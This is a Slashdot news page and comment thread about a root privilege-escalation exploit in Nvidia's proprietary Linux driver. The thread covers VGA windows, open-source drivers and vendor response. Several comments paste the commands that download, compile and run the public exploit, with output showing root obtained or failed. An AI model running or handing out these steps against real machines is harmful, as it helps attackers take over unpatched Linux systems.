Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

Unknown Lamer posted about 2 years ago | from the rms-gazes-upon-you-smugly dept.

Security 180

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

cancel ×

180 comments

Use Windows | +5 Insightful (5, Funny)

h910 (2698573) | about 2 years ago | (#40844929)

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Re:Use Windows | +5 Insightful (5, Funny)

broginator (1955750) | about 2 years ago | (#40845139)

That's like saying "Drive Fords, that way you won't crash in a Chevy."

Re: (1)

Fwipp (1473271) | about 2 years ago | (#40845895)

Especially if you're referring to a Pinto.

Re:Use Windows | +5 Insightful (4, Insightful)

Tapewolf (1639955) | about 2 years ago | (#40846391)

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.

Re:Use Windows | +5 Insightful (1)

pulski (126566) | about 2 years ago | (#40846449)

Don't feed the trolls.

h### account name promoting Microsoft. I'm shocked!

Re:Use Windows | +5 Insightful (0)

Anonymous Coward | about 2 years ago | (#40846591)

Wow. Microsoft's shills are actually using the subject header to try to mislead Slashdot readers into thinking the post was rated anything above the -2 it deserves*? Good gravy, everyone, this is it. THIS is what Microsoft's desperation looks like when they discover they can't buy or bully their way through the tech world any more.

*: Yes, I know they fixed that bug a long time ago.

Re:Use Windows | +5 Insightful (0)

Anonymous Coward | about 2 years ago | (#40847125)

You're pretty paranoid if you think that's a Microsoft shill.

The header trick is WAY too smart for them.

Use Windows (Sore:200,000, Parent is an Amature) (0, Funny)

Anonymous Coward | about 2 years ago | (#40846593)

Pssst..... Amature.

CAPTCHA = muddlers

Re:Use Windows (Sore:200,000, Parent is an Amature (0)

Anonymous Coward | about 2 years ago | (#40847097)

He may indeed be an amateur, but at least he didn't misspell anything, let alone a ridiculously common and simple word.

A view to a kill. (2, Interesting)

Anonymous Coward | about 2 years ago | (#40844961)

Shouldn't the VGA window be a window into the video memory, or at least configuration registers?

Re:A view to a kill. (5, Informative)

greg1104 (461138) | about 2 years ago | (#40845101)

VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

Re:A view to a kill. (3, Insightful)

causality (777677) | about 2 years ago | (#40845681)

Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

... that nobody uses anymore, at least not with PC hardware.

Re:A view to a kill. (2)

The MAZZTer (911996) | about 2 years ago | (#40846117)

Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

Re:A view to a kill. (2, Insightful)

Anonymous Coward | about 2 years ago | (#40845683)

Is this due to a very old code base in the windows driver, and the driver code being shared between both linux and windows? Compatibility makes sense if you are running DOS or allowing DOS apps to function (or maybe 16-bit windows). But I very much doubt Monochrome, CGA, EGA, and some of the old VGA standard works at all in modern windows, and definitely not in linux.

This should never have been exposed to the user in linux and hopefully not in windows either. And if compatibility is a concern, then it should be through emulation and a protected path if hardware access is useful.

Re:A view to a kill. (3, Informative)

Desler (1608317) | about 2 years ago | (#40845759)

Windows 7 still includes a VGA video driver.

Re:A view to a kill. (2)

rjr162 (69736) | about 2 years ago | (#40846143)

That it does. Reimaged a dell e6240 laptop using IBM's tavoli system manager the other week, and it apparently failed at some point. Everything installed and worked except the one video driver.
These laptops can use the built in intel video for battery savings and switch over to a build in nvidia "card" when more grunt is needed. The issue was the laptop wouldn't output video to an external monitor. I checked in device manager and the nvidia card was listed as it should be, but the intel video was listed as "generic VGA" which still allowed video to display on the laptop screen but didn't have the ability to work with an external monitor.

Re:A view to a kill. (1)

hobarrera (2008506) | about 2 years ago | (#40846473)

Users wanting monochrome/CGA/EGA could just use nouveau, the only reason to use the nvidia binary blob is to support 2D/3D acceleration.

Nope (2)

FranTaylor (164577) | about 2 years ago | (#40847481)

TwinView doesn't work in nouveau

Re:A view to a kill. (3, Insightful)

greg1104 (461138) | about 2 years ago | (#40846931)

VGA works fine in Windows and in Linux. See Linux framebuffer [wikipedia.org] as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.

Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.

Re:A view to a kill. (3, Interesting)

MightyMartian (840721) | about 2 years ago | (#40846311)

So how does Windows deal with restricting where this window can be remapped?

Re:A view to a kill. (1)

hobarrera (2008506) | about 2 years ago | (#40846451)

But do we really need this backwards compatibility? Look at the supported video cards; does anyone that uses those cards need compatibility with that? The driver also required a relatively recent kernel; so again, is this compatibility required?

I'm not trying to be ironic, I'm legitimately in doubt here.

Re:A view to a kill. (1)

shentino (1139071) | about 2 years ago | (#40847029)

Older video standards have been banned ever since KMS depended on FBCON in the kernel.

Woohoo! Nvidia drivers rock! (-1, Flamebait)

MatthiasF (1853064) | about 2 years ago | (#40844979)

Obligatory fanboy zing.

Re:Woohoo! Nvidia drivers rock! (-1)

Anonymous Coward | about 2 years ago | (#40845189)

Yes, they do. nouveau sucks fat, hairy dicks.

Hoooo boy... (4, Interesting)

Tarlus (1000874) | about 2 years ago | (#40845025)

With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.

Re:Hoooo boy... (0)

DaveV1.0 (203135) | about 2 years ago | (#40846639)

And, Nvidia will not care what the FOSS community does. 90+% of Nvidia's customers don't use FOSS at all. So many people forget that FLOSS is, at best, a niche market and as such has little influence on business decisions.

Re:Hoooo boy... (5, Insightful)

Anonymous Coward | about 2 years ago | (#40846825)

Correct. That's why i choose AMD.

Not that they're that much better, but at least they tried to.

Re:Hoooo boy... (0)

Anonymous Coward | about 2 years ago | (#40847087)

I think Nvidia cares. But not as much for gamers as for GPGPU number crunchers.

Re:Hoooo boy... (2, Insightful)

Anonymous Coward | about 2 years ago | (#40847261)

Nvidia's future is going to be determined almost entirely on success or failure of the Tegra line, which will predominantly run Android. That's why Linus flipped them the bird. Nvidia, as a company, is becoming increasingly dependent upon Linux to succeed financially. Yet they are not making any effort to engage developers or the community at large.

Open Source Advantage (5, Insightful)

Nerdfest (867930) | about 2 years ago | (#40845027)

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Re:Open Source Advantage (0)

Anonymous Coward | about 2 years ago | (#40845109)

Can't do half of what i like to do with my computer using nouveau, it sucks.

Re:Open Source Advantage (5, Funny)

Dagger2 (1177377) | about 2 years ago | (#40845197)

Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

Re:Open Source Advantage (1)

jedidiah (1196) | about 2 years ago | (#40845325)

You have to get to it first. Good luck with that.

Re:Open Source Advantage (-1)

Anonymous Coward | about 2 years ago | (#40845951)

You got an nVidia GPU, right? Don't look, but Dagger2 is already ordering stuff on your behalf. I hope you like receiving boxes of SPAM from eBay and Amazon!

I'll take my chances (0)

Anonymous Coward | about 2 years ago | (#40845515)

People don't buy HD cards to get tearing, pixelated images and laggy playback using shitty opensource drivers.

But before the zealots complain about closed drivers, they might try coming up with some decent opensource A/V players that are fully featured and actually work.

Not to mention, for years zealots have been deriding ATI cards, then i finally switch, and linus gets a hardon for nvidia.

Re:I'll take my chances (2)

konaya (2617279) | about 2 years ago | (#40845899)

Or better yet: nVidia could actually make their driver open source. That way, we'll have all the bells and whistles, and when a security flaw gets known the community can patch it without nVidia's involvement.

Re:I'll take my chances (0)

Anonymous Coward | about 2 years ago | (#40846367)

Two things:

1. Everybody who knows enough about the guts of nVidia hardware to write HW accelerated drivers for it is employed by nVidia already

2. There are probably huge patent, trade secret and NDA issues even if they wanted to release the source.

Also, http://xkcd.com/619/

For limited values of "you" (4, Funny)

Anonymous Coward | about 2 years ago | (#40845825)

It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.

So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.

Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!

Re:For limited values of "you" (4, Insightful)

Nerdfest (867930) | about 2 years ago | (#40847133)

When are we going to get all the software available prepackaged and regularly updated from the repository?

That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.

Re:Open Source Advantage (1)

ilikenwf (1139495) | about 2 years ago | (#40845527)

It's hard to run GL based apps in Wine or use VMWare machines with nouvau...I've tried...that's all it lacks for me to use it all the time.

Re:Open Source Advantage (0)

Anonymous Coward | about 2 years ago | (#40846005)

I use VMware machines with radeon driver on an AMD card. Works perfectly.

Re:Open Source Advantage (1)

Zontar The Mindless (9002) | about 2 years ago | (#40847475)

I use VMWare almost every single day on a Linux host that employs the Nouveau drivers, and it works fine. KDE 4 desktop on the host, a bit of eye candy.

If you're trying to use the Nouveau (or even the proprietary) drivers *inside* a VMware guest, that's just silly, and I really hope that's not what you meant.

Re:Open Source Advantage (0)

Anonymous Coward | about 2 years ago | (#40845675)

yeah, it sucks... Can't do half of what i like to do with your computer using nouveau.

Re:Open Source Advantage (1)

hobarrera (2008506) | about 2 years ago | (#40846517)

It could have happened, and most probably would have happened at some point, but might have been spotted sooner, and would have been fixed long ago now.
Plus, I'm sure there's plenty of other bugs/exploits we still haven't even discovered.

It might have been patched already... (1)

tlambert (566799) | about 2 years ago | (#40846659)

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Sure, it's be patched, and you could probably apply the patch locally, but it wouldn't be in the official repository yet. And then you get to wait for the review process, where someone tells you how they would have done it differently, if they only had the time or the interest, but since you didn't do it that way, you need to rewrite your patch. This is pretty much true of most Open Source communities, which tend not to take rough consensus and working code, and then clean up the cosmetic stuff later.

Then you get to wait for it to move from "development" to "beta" to "stable" before it actually makes it into an official release version. In most Open Source communities, this whole thing can take months.

In general, I'd have to say Open Source doesn't win over closed in this case, and I say that as a long time Open Source person.

Who did he send it to at Nvidia? (-1, Flamebait)

Meshach (578918) | about 2 years ago | (#40845085)

So no one at Nvidia replied when some random joe off the street sent flimsy evidence of a vague exploit to them unsolicited? Can't say I am surprised...

Re:Who did he send it to at Nvidia? (5, Insightful)

Anonymous Coward | about 2 years ago | (#40845187)

Maybe people need to stop being apologists for this kind of thing...

Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.

Re:Who did he send it to at Nvidia? (0)

Anonymous Coward | about 2 years ago | (#40845247)

I read that as "So noone at Nvidia could be bothered to spend 15 minutes and check out the evidence to a reported exploit."

Re:Who did he send it to at Nvidia? (5, Informative)

nedlohs (1335013) | about 2 years ago | (#40845255)

Yeah you don't get more flimsy evidence than a working exploit.

Re:Who did he send it to at Nvidia? (4, Interesting)

ZeroSumHappiness (1710320) | about 2 years ago | (#40845467)

If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.

Re:Who did he send it to at Nvidia? (-1)

Anonymous Coward | about 2 years ago | (#40845569)

Oh no! Once less neckbeard for their support people to deal with. I'm sure they're quaking with fright.

Re:Who did he send it to at Nvidia? (1)

Anonymous Coward | about 2 years ago | (#40845625)

/steps on the soap box. Heh, Microsoft the one with the most security holes of the bunch and you are throwing these statements around? They have holes from years ago that they haven't fixed and just come back with the "upgrade your OS" line of B.S. And UAC is supposed to make Windows Vista/7 secure, that is a joke.

I fully understand that it takes a while for companies to stamp out bugs but I think companies have become far too lax on their bug squashing. The people that buy their products become their beta testers and this to me is just wrong. I do software testing and I know from 20 yrs of testing that companies will downgrade bugs even if they are considered critical by the testers just to get a product out the door on time. They will then try to minimize the damage until they can put out the next version with a hopeful fix in them.

I think we need to make some of these companies responsible for their horrible code and lack of testing. /steps off the soap box

Re:Who did he send it to at Nvidia? (2)

ZeroSumHappiness (1710320) | about 2 years ago | (#40845901)

I didn't say Windows was perfect, just that if you send a (crank) security exploit to Microsoft they review it. They may not fix it. They may say the best that you can do is upgrade, but they know whether or not it's a real hole. (At least, that's the policy.)

Nvidia rotten to the core (2, Insightful)

Jerry Atrick (2461566) | about 2 years ago | (#40845215)

Nvidia are just serial fuckups. Wasted half my saturday trying to find a driver release that would work on my wifes Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned of as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV out support when Vista shipped.

Frankly a root exploit is one of their lesser sins.

Re:Nvidia rotten to the core (0, Troll)

ilikenwf (1139495) | about 2 years ago | (#40845575)

If you ran a distro that didn't suck, you wouldn't be having issues... Archlinux, gentoo, slackware...I mean, Arch would work best for you here - you just "yaourt -S nvidia-beta-all" and done.

Re:Nvidia rotten to the core (3, Insightful)

Anonymous Coward | about 2 years ago | (#40845855)

Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"

Re:Nvidia rotten to the core (2)

hobarrera (2008506) | about 2 years ago | (#40846585)

His advice makes sense.
You bought hardware from a company unwilling to document it's hardware and unwilling to release it's drivers, installed a distro that opts for FLOSS drivers, and then compained the combination didn't work. Of course it didn't, you can't just have ANY software run with ANY hardware perfectly as you expect it to.

Re:Nvidia rotten to the core (0)

Anonymous Coward | about 2 years ago | (#40847157)

He's not running some osbcure distro called Gnu/Wierdo Linux, it's friggin Kubuntu, which is Ubuntu with KDE. An Nvidia card ought to work if it will work at all on linux. And if it wouldn't, then Nvidia shouldn't claim to support Linux.

  And you're ignoring the fact that Nvidia's support still sucks.

distro wars or idiot vs adept. (1)

OrangeTide (124937) | about 2 years ago | (#40847159)

If people keep insisting on abusing their watered down idiot's distro, then crying when it doesn't work. We're going to keep telling them to use the right tool for the job!

Re:Nvidia rotten to the core (1)

interval1066 (668936) | about 2 years ago | (#40845811)

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

It basically abuses the fact that the /dev/nvidia0 device accept changes to the VGA window and moves the window around until it can read/write to somewhere useful in physical RAM, then it just does an priv escalation by writing directly to kernel memory.

It doesn't take a lot of thought to understand the implications of the hole. And smacks of pure lazyness on the part of nVidia.

Re:Nvidia rotten to the core (4, Informative)

Jerry Atrick (2461566) | about 2 years ago | (#40846071)

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

Over a year of data loss for anyone that believed them.

Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

Re:Nvidia rotten to the core (2)

gl4ss (559668) | about 2 years ago | (#40847025)

haha, that's a fucking classic.

makes me laugh almost as hard as believing that I'd get video decoding support in gpu when I bought a gf 6800 back in the day(you know, because it said so on the box). "In late 2005, an update to Nvidia's website finally confirmed what had long been suspected by the user community: WMV-acceleration is not available on the AGP 6800. Of course, today's standard computers are fast enough to play WMV9 video and other sophisticated codecs like MPEG-4, H.264 or Theora without hardware acceleration." (I'm just kidding, I didn't believe them to have actually working acceleration for video decode when I bought them, I did however think that they'd get it sorted out in the drivers for some random video player program to use.. never happened).

Re:Nvidia rotten to the core (5, Insightful)

fuzzyfuzzyfungus (1223518) | about 2 years ago | (#40846107)

Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

Re:Nvidia rotten to the core (0)

Anonymous Coward | about 2 years ago | (#40846001)

shoudlnt run linux nube go to windows.

Re:Nvidia rotten to the core (1)

Fwipp (1473271) | about 2 years ago | (#40846061)

I recommend booting from a LiveCD before installing so you can see if the drivers work.

Re:Nvidia rotten to the core (1)

hobarrera (2008506) | about 2 years ago | (#40846551)

In your particular case, the issue is Ubuntu, that does not ship the driver properly, or have any simple way of installing it, and not Nvidia. You'd better use a distro that actually supports it, or use hardware(and driver) your distro completely supports.

works here (5, Informative)

Anonymous Coward | about 2 years ago | (#40845239)

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

Re:works here (5, Informative)

dmitrygr (736758) | about 2 years ago | (#40845707)

64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846047)

me@mine:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
me@mine:~$ mv 86747-001.bin nvid-root.c
me@mine:~$ gcc nvid-root.c -o nvid-root
me@mine:~$ ./nvid-root
[*] IDT offset at 0xffffffff81e35000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81e35dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.
me@mine:~$ uname -a
Linux foofoo 3.1.10-1.16-desktop #1 SMP PREEMPT Wed Jun 27 05:21:40 UTC 2012 (d016078) x86_64 x86_64 x86_64 GNU/Linux
me@mine:~$ rpm -qa | grep -i nvidia
nvidia-computeG02-295.49-17.1.x86_64
x11-video-nvidiaG02-295.49-17.1.x86_64
nvidia-gfxG02-kmp-desktop-295.49_k3.1.0_1.2-16.1.x86_64

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846307)

// This should probably work for 64-bits and 32-bits kernels // But only tested on 64-bits kernels
inline static long init_kallsyms(struct kallsyms *ks) ...
Funny thing from the code, they say they tested it on 64 bit kernels but it *should* work on 32 bit, but from the above posts, it didnt work on two
64 bit kernels but did work on the 32 bit.

Re:works here (3, Interesting)

Ken_g6 (775014) | about 2 years ago | (#40846123)

Doesn't work for me on Linux Mint Debian Edition with Xfce, nVidia driver version x86_64-290.10:

uname -a | sed -e 's/^[^0-9]*//'
3.2.0-2-amd64 #1 SMP Sun Mar 4 22:48:17 UTC 2012 x86_64 GNU/Linux

lsb_release -a
LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch
Distributor ID: LinuxMint
Description: Linux Mint Xfce Edition
Release: 1
Codename: debian

./nvid-root
[*] IDT offset at 0xffffffff8172a000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff8172adc0)
[*] Enhancing gate entry...
[*] Triggering payload...
Killed

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500504] Oops: 0000 [#1] SMP

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500641] Stack:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500658] Call Trace:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500675] Code: Bad RIP value.

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500684] CR2: ffffffff81a00000

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846277)

Does it open any sort of "hole" that "bad guys" could use remotely, or they need to have physical control of the computer to use this exploit?

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846993)

generically speaking this is local only, they would have to have a shell account to use the code as is. of course, the guts of it could be included in any software you might download and software could be running as your user id, escalate itself to root privs, and then open itself to outside world. This is why trust is important with regards to repositories and the like.

Consider how many places on the net say to do task xyz, add this line to your apt-sources and then install via apt-get install. How well do you trust those repositories that are not hugely community reviewed? // captcha is mischief, hah

Re:works here (1)

TuxThePenguin2205 (1031140) | about 2 years ago | (#40846343)

Kinda works for me. Get root on Gentoo box Then everything stopped working within a couple of seconds. any programs started were auto killed and all networking stopped dead. I saw an kernel oops in the kernel ring log. a reboot was required to do anything useful. Linux mysystem 3.2.12-gentoo #1 SMP PREEMPT Mon Mar 26 12:55:47 BST 2012 x86_64 Intel(R) Core(TM) i7 CPU 970 @ 3.20GHz GenuineIntel GNU/Linux NVRM version: NVIDIA UNIX x86_64 Kernel Module 295.59 Wed Jun 6 21:19:40 PDT 2012

Re:works here (1)

MikeBabcock (65886) | about 2 years ago | (#40847059)

One wonders if its possible to block this with SELinux.

Re:works here (2, Insightful)

fnj (64210) | about 2 years ago | (#40847251)

Why not; SELinux certainly has no problem blocking anything useful from working.

Re:works here (1)

digitalaudiorock (1130835) | about 2 years ago | (#40847077)

Didn't work on either 32 bit gentoo machines of mine. One with an old card that requires nvidia-drivers-96.43.20: ./nvid-root
[*] IDT offset at 0xc13fe000
[*] Abusing nVidia...
(just ended there)...and one with nvidia-drivers-295.49: ./nvid-root
[*] IDT offset at 0xc13d4000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc13d46e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffb (-5)
[*] Failed to get root.

Re:works here (1)

Tapewolf (1639955) | about 2 years ago | (#40847279)

Worked on mine with a custom 3.4 kernel (on AMD64) and with Nvidia 304.22. I'm going to upgrade to 3.5 and see if that makes any difference. Unsurprisingly, but annoyingly, it's knackered VGA mode so I can't switch back to the VTs.

Again? (0)

Anonymous Coward | about 2 years ago | (#40845395)

This isn't the first time that the Nvidia driver has had serious security vulnerabilities. It also happened in 2006:

http://phoronix.com/scan.php?page=news_item&px=Mjk5Nw [phoronix.com]

Re:Again? (1)

Anonymous Coward | about 2 years ago | (#40845665)

You mean six years ago they also had a vulnerability? In the modern world we live, that sounds like a ringing fucking endorsement. With companies like Microsoft, you need only say something like, "last Tuesday." Doesn't sound like a bad track record to me.

Re:Again? (2)

TheRaven64 (641858) | about 2 years ago | (#40845817)

They have security vulnerabilities fairly regularly. Ones that are remotely exploitable are rarer, but the cited one from the grandparent was first known in 2004, not fixed until 2006, and allowed someone to anyone who could make you display an image (e.g. in a web page) run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

Re:Again? (0)

Anonymous Coward | about 2 years ago | (#40847313)

the cited one from the grandparent was first known in 2004, not fixed until 2006

Not true. The advisory writer confused an X server bug (also exploitable!) from 2004 with the nVidia one from 2006. http://nvidia.custhelp.com/app/answers/detail/a_id/1971/~/linux---how-does-the-rapid7-advisory-r7-0025-affect-the-nvidia-unix-driver [custhelp.com]

and allowed someone to anyone who could make you display an image (e.g. in a web page) run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

Also not true. It required carefully-crafted fonts and let you run code in the X server (which usually runs as root, but doesnt have to).

good thing (1)

slashmydots (2189826) | about 2 years ago | (#40845599)

Good thing all the outside the box type virus writers are busy writing malware for Macs so they don't have time to focus on Linux lol.

meh (4, Interesting)

ThorGod (456163) | about 2 years ago | (#40845659)

Not too long ago Intel had a firmware exploit in their processors.

I still appreciate the effort Nvidia's made to support their cards on OSes such as linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.

Here's hoping they keep trucking along at it, even with what Linus' said and now this.

Re:meh (1)

John Hasler (414242) | about 2 years ago | (#40845763)

I bought one Nvidia card because of their wonderful Linux support. I'll never buy another.

Re:meh (0)

Anonymous Coward | about 2 years ago | (#40846579)

I never bought a graphics card. Should I have?

Re:meh (1)

gman003 (1693318) | about 2 years ago | (#40847221)

Even if you've never bought a discrete card, you've used one, integrated either onto the motherboard, into the northbridge, or on the processor itself.

One of my earliest computers had an ATI Rage 3D right on the motherboard. Later, I used one with an nVidia chipset, which had (I believe) a 7000-series GPU integrated with the northbridge. My current laptop has an Intel GPU right on the processor (it also has a discrete nVidia card). Unless your computer literally does not have any video capability, it has some sort of graphics "system". Quite possibly an Nvidia chip (they're the largest, followed by AMD, Intel, PowerVR, and a few others (I think Matrox is still around)).

Re:meh (0)

Anonymous Coward | about 2 years ago | (#40847413)

No. Discrete graphics cards are for bird brains.

Re:meh (1)

interval1066 (668936) | about 2 years ago | (#40846519)

Um... Intel...? Just sayin', nVidia isn't your only choice for Linux support.

Re:meh (1)

MikeBabcock (65886) | about 2 years ago | (#40847063)

Okay, Intel makes drivers. What they don't make is video cards that work worth a damn.

He meant to say, "of the video cards that can play games with decent frame rates, NVidia has the best drivers on Linux."

Re:meh (0)

Anonymous Coward | about 2 years ago | (#40847457)

Go Intel. I'll never return to nVidia or ATI. Intel's graphics are actually comparable now to the low end nVidia. Plus Intels cards support video. It's not all better in nVidia land. Intel's drivers are completely free. Unlike nVidia and ATI who work against free software. AMD only releases a partial driver. It doesn't even partially work without the non-free component.

privilege escalation hole? (1)

paxprobellum (2521464) | about 2 years ago | (#40845725)

"privilege escalation hole" sounds like something after "friends with benefits". Just saying.

Won't work on 64 bit (0)

Anonymous Coward | about 2 years ago | (#40845929)

[*] IDT offset at 0xffffffff81962000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81962dc0)
[*] Enhancing gate entry...
[ ] Failed!

So who here runs a secure X11 with any driver? (1)

Anonymous Coward | about 2 years ago | (#40845945)

X11 has NEVER been secure its ridiculous to try and point the finger at Nvidia and this is why they have not cared for a month. Its a favorite interview question I use on *NIX applicants- "So tell me, how do you secure X11?". Usually this question gets some laughs and a nice way to break the ice. Seriously though, what is the alternative here? The Ford Escape catches on fire but would you turn down a Ford GT? Probably not and the same goes for graphics acceleration- are you going to turn down that fire-breathing graphics card in your hot little hands? Probably not. If someone gets into your X11 box at that level there is a problem with your network not the Linux box.

Re:So who here runs a secure X11 with any driver? (1)

PenquinCoder (1431871) | about 2 years ago | (#40847383)

"So tell me, how do you secure X11?"

Get rid of it. Use Wayland.

One of many (4, Insightful)

jandrese (485) | about 2 years ago | (#40845991)

The graphics driver is both monstrously large and operates at a very low level, there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmak put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.

Only a month notice? (1)

gr8_phk (621180) | about 2 years ago | (#40846529)

